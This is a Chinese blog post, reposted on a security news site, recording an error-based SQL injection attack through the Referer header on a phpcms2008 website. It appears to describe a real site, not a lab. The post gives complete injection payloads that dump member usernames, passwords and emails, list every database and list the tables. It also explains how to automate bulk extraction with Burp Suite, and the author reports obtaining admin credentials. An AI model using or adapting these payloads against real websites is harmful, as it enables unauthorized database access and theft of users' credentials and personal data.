报错注入(配合burpsuite)一些记录

暗月博客 2019年11月21日17:26:06评论374 views字数 1259阅读4分11秒阅读模式
摘要

0x01:前因           最近有一个案例是phpcms2008架构的网站,独立服务器,表示压力山大,很久没检测过站,那就来试试把。

0x01:前因

          最近有一个案例是phpcms2008架构的网站,独立服务器,表示压力山大,很久没检测过站,那就来试试把。

0x02:过程

          phpcms2008之前是出现过不少漏洞,记得以前也写过这套cms的exp,那我们拿起exp来试试把。居然获取到表的前缀,获取不到管理的帐号很密码。好把 我们再来一次 果断成功。

暂时我们虽然拿到帐号和密码,但是默认登录都被修改过。即使拿到帐号跟密码都没用咯,暂时!!!

如图:

报错注入(配合burpsuite)一些记录

0x03:信息收集

          那只能来收集一下信息咯,我想通过这个注入点达到更好的一些数据,看是否存在一些敏感的表,因为这个网站二级目录还有一些敏感的信息。

REFERER:fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x3a,email,0x27,0x7e) from web_member limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#

web_member limit 1,1))将1设置成变量 设置好获取的正则之后我们就可以批量获取 membe的会员如图:

报错注入(配合burpsuite)一些记录

爆所有裤
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#

爆所有表 如图

报错注入(配合burpsuite)一些记录
(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=73715f6a7a6c6e limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#

都转码一下如图

报错注入(配合burpsuite)一些记录

0x04 结束

        至此关于burpsuite报错注入就到这里把!!!!!不详细继续深入了 。。。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日17:26:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   报错注入(配合burpsuite)一些记录https://cn-sec.com/archives/71131.html

发表评论

匿名网友 填写信息